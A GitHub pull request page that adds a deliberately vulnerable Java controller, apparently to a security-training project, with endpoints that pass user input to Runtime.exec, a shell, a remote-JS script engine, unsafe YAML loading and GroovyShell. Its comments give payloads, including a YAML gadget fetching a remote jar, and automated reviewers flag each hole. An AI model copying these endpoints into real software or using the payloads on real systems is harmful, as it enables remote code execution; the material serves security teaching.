Skip to content

add Rce.java #3

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
cccfeng wants to merge 1 commit into
base: master
Choose a base branch
from
Open

add Rce.java #3

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
138 changes: 138 additions & 0 deletions src/main/java/org/joychou/controller/Rce2.java
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,138 @@
package org.joychou.controller;

import groovy.lang.GroovyShell;
import lombok.extern.slf4j.Slf4j;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;

import javax.script.Bindings;
import javax.script.ScriptContext;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;
import java.io.BufferedInputStream;
import java.io.BufferedReader;
import java.io.InputStreamReader;


/**
* Java code execute
*
* @author JoyChou @ 2018-05-24
*/
@Slf4j
@RestController
@RequestMapping("/rce")
public class Rce {

@GetMapping("/runtime/exec")
public String CommandExec(String cmd) {
Runtime run = Runtime.getRuntime();
StringBuilder sb = new StringBuilder();

try {
Process p = run.exec(cmd);

Check failure

Code scanning / SonarCloud

OS commands should not be vulnerable to command injection attacks

<!--SONAR_ISSUE_KEY:AZWiEIx5GaQdYdx2B2UD-->Change this code to not construct the OS command from user-controlled data. <p>See more on <a href="https://sonarcloud.io/project/issues?id=cccfeng_java-sec-code&issues=AZWiEIx5GaQdYdx2B2UD&open=AZWiEIx5GaQdYdx2B2UD&pullRequest=3">SonarQube Cloud</a></p>

Check failure

Code scanning / SonarCloud

OS commands should not be vulnerable to command injection attacks

<!--SONAR_ISSUE_KEY:AZWiEWIQAKPcbPrntm8Y-->Change this code to not construct the OS command from user-controlled data. <p>See more on <a href="https://sonarcloud.io/project/issues?id=cccfeng_java-sec-code&issues=AZWiEWIQAKPcbPrntm8Y&open=AZWiEWIQAKPcbPrntm8Y&pullRequest=7">SonarQube Cloud</a></p>
BufferedInputStream in = new BufferedInputStream(p.getInputStream());
BufferedReader inBr = new BufferedReader(new InputStreamReader(in));
String tmpStr;

while ((tmpStr = inBr.readLine()) != null) {
sb.append(tmpStr);
}

if (p.waitFor() != 0) {
if (p.exitValue() == 1)
return "Command exec failed!!";
}

inBr.close();
in.close();
} catch (Exception e) {
return e.toString();
}
return sb.toString();
}
Comment on lines +30 to +56
Copy link

@coderabbitai coderabbitai bot Mar 16, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue

存在高危的系统命令注入风险(Runtime.exec)
此处直接将用户输入 cmd 传给 Runtime.exec(),可能导致攻击者执行任意命令。建议对输入进行严格校验或移除此功能,并在必要时使用更安全的替代方案(例如预定义的命令白名单)。

以下示例展示如何禁止直接执行来自用户的输入:

 public String CommandExec(String cmd) {
-    Process p = run.exec(cmd);
+    // TODO: 强制使用安全设计,禁止直接执行用户命令
+    throw new UnsupportedOperationException("禁止传入任意命令执行。请先进行安全改造。");
}

Committable suggestion skipped: line range outside the PR's diff.

🧰 Tools
🪛 GitHub Check: SonarCloud

[failure] 36-36: OS commands should not be vulnerable to command injection attacks

Change this code to not construct the OS command from user-controlled data.

See more on SonarQube Cloud



/**
* <a href="http://localhost:8080/rce/ProcessBuilder?cmd=whoami">POC</a>
*/
@GetMapping("/ProcessBuilder")
public String processBuilder(String cmd) {

StringBuilder sb = new StringBuilder();

try {
String[] arrCmd = {"/bin/sh", "-c", cmd};
ProcessBuilder processBuilder = new ProcessBuilder(arrCmd);

Check failure

Code scanning / SonarCloud

OS commands should not be vulnerable to command injection attacks

<!--SONAR_ISSUE_KEY:AZWiEIx5GaQdYdx2B2UC-->Change this code to not construct the OS command from user-controlled data. <p>See more on <a href="https://sonarcloud.io/project/issues?id=cccfeng_java-sec-code&issues=AZWiEIx5GaQdYdx2B2UC&open=AZWiEIx5GaQdYdx2B2UC&pullRequest=3">SonarQube Cloud</a></p>

Check failure

Code scanning / SonarCloud

OS commands should not be vulnerable to command injection attacks

<!--SONAR_ISSUE_KEY:AZWiEWIQAKPcbPrntm8Z-->Change this code to not construct the OS command from user-controlled data. <p>See more on <a href="https://sonarcloud.io/project/issues?id=cccfeng_java-sec-code&issues=AZWiEWIQAKPcbPrntm8Z&open=AZWiEWIQAKPcbPrntm8Z&pullRequest=7">SonarQube Cloud</a></p>
Process p = processBuilder.start();
BufferedInputStream in = new BufferedInputStream(p.getInputStream());
BufferedReader inBr = new BufferedReader(new InputStreamReader(in));
String tmpStr;

while ((tmpStr = inBr.readLine()) != null) {
sb.append(tmpStr);
}
} catch (Exception e) {
return e.toString();
}

return sb.toString();
}
Comment on lines +63 to +83
Copy link

@coderabbitai coderabbitai bot Mar 16, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue

同样存在高危的系统命令注入风险(ProcessBuilder)
Runtime.exec 相似,ProcessBuilder 在此处直接使用了用户输入的命令字符串 cmd。若攻击者能控制此参数,则可能导致任意命令执行。应避免基于未经校验的外部输入拼装命令。

可考虑通过以下方式处理:

 String[] arrCmd = {"/bin/sh", "-c", cmd};
-ProcessBuilder processBuilder = new ProcessBuilder(arrCmd);
+// TODO: 禁止使用未校验的用户输入进行命令执行
+throw new UnsupportedOperationException("禁止传入任意命令执行。请先进行安全改造。");

Committable suggestion skipped: line range outside the PR's diff.

🧰 Tools
🪛 GitHub Check: SonarCloud

[failure] 69-69: OS commands should not be vulnerable to command injection attacks

Change this code to not construct the OS command from user-controlled data.

See more on SonarQube Cloud



/**
* http://localhost:8080/rce/jscmd?jsurl=http://xx.yy/zz.js
*
* curl http://xx.yy/zz.js
* var a = mainOutput(); function mainOutput() { var x=java.lang.Runtime.getRuntime().exec("open -a Calculator");}
*
* @param jsurl js url
*/
@GetMapping("/jscmd")
public void jsEngine(String jsurl) throws Exception{
// js nashorn javascript ecmascript
ScriptEngine engine = new ScriptEngineManager().getEngineByName("js");
Bindings bindings = engine.getBindings(ScriptContext.ENGINE_SCOPE);
String cmd = String.format("load(\"%s\")", jsurl);
engine.eval(cmd, bindings);

Check failure

Code scanning / SonarCloud

Dynamic code execution should not be vulnerable to injection attacks

<!--SONAR_ISSUE_KEY:AZWiEIx5GaQdYdx2B2UE-->Change this code to not dynamically execute code influenced by user-controlled data. <p>See more on <a href="https://sonarcloud.io/project/issues?id=cccfeng_java-sec-code&issues=AZWiEIx5GaQdYdx2B2UE&open=AZWiEIx5GaQdYdx2B2UE&pullRequest=3">SonarQube Cloud</a></p>

Check failure

Code scanning / SonarCloud

Dynamic code execution should not be vulnerable to injection attacks

<!--SONAR_ISSUE_KEY:AZWiEWIQAKPcbPrntm8a-->Change this code to not dynamically execute code influenced by user-controlled data. <p>See more on <a href="https://sonarcloud.io/project/issues?id=cccfeng_java-sec-code&issues=AZWiEWIQAKPcbPrntm8a&open=AZWiEWIQAKPcbPrntm8a&pullRequest=7">SonarQube Cloud</a></p>
}
Comment on lines +95 to +101
Copy link

@coderabbitai coderabbitai bot Mar 16, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue

动态执行JS脚本存在严重安全隐患
jsEngine 方法从外部 URL 加载并执行 JavaScript,这为攻击者提供了远程任意代码执行的可能。建议彻底审查业务需求,若非必要,不要允许外部脚本的直接加载与执行。

如果确有场景需要运行受信任脚本,建议采用签名校验或严格白名单方式:

 String cmd = String.format("load(\"%s\")", jsurl);
-engine.eval(cmd, bindings);
+throw new UnsupportedOperationException("禁止直接加载外部JS,需改用安全方案或白名单。");
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
public void jsEngine(String jsurl) throws Exception{
// js nashorn javascript ecmascript
ScriptEngine engine = new ScriptEngineManager().getEngineByName("js");
Bindings bindings = engine.getBindings(ScriptContext.ENGINE_SCOPE);
String cmd = String.format("load(\"%s\")", jsurl);
engine.eval(cmd, bindings);
}
public void jsEngine(String jsurl) throws Exception{
// js nashorn javascript ecmascript
ScriptEngine engine = new ScriptEngineManager().getEngineByName("js");
Bindings bindings = engine.getBindings(ScriptContext.ENGINE_SCOPE);
String cmd = String.format("load(\"%s\")", jsurl);
throw new UnsupportedOperationException("禁止直接加载外部JS,需改用安全方案或白名单。");
}
🧰 Tools
🪛 GitHub Check: SonarCloud

[failure] 100-100: Dynamic code execution should not be vulnerable to injection attacks

Change this code to not dynamically execute code influenced by user-controlled data.

See more on SonarQube Cloud



/**
* http://localhost:8080/rce/vuln/yarm?content=!!javax.script.ScriptEngineManager%20[!!java.net.URLClassLoader%20[[!!java.net.URL%20[%22http://test.joychou.org:8086/yaml-payload.jar%22]]]]
* yaml-payload.jar: https://github.com/artsploit/yaml-payload
*
* @param content payloads
*/
@GetMapping("/vuln/yarm")
public void yarm(String content) {
Yaml y = new Yaml();
y.load(content);
}
Comment on lines +111 to +114
Copy link

@coderabbitai coderabbitai bot Mar 16, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue

通过不安全的构造器加载 YAML 或导致任意代码执行
使用 new Yaml() 加载未受控内容时,可能触发反序列化漏洞或其他任意代码执行风险(尤其在 org.yaml.snakeyaml 旧版本中)。如需解析复杂数据结构,应启用更严格的限制或使用 SafeConstructor 并进一步加强类型白名单。


@GetMapping("/sec/yarm")
public void secYarm(String content) {
Yaml y = new Yaml(new SafeConstructor());
y.load(content);
}

/**
* http://localhost:8080/rce/groovy?content="open -a Calculator".execute()
* @param content groovy shell
*/
@GetMapping("groovy")
public void groovyshell(String content) {
GroovyShell groovyShell = new GroovyShell();
groovyShell.evaluate(content);
}
Comment on lines +127 to +130
Copy link

@coderabbitai coderabbitai bot Mar 16, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue

动态执行 Groovy 脚本存在远程代码执行风险
GroovyShell 可执行任意自定义脚本。若用户可控制 content,将存在高危RCE。应视具体需求对脚本进行严格限制或考虑移除此功能。




public static void main(String[] args) throws Exception{
Runtime.getRuntime().exec("touch /tmp/x");
}
}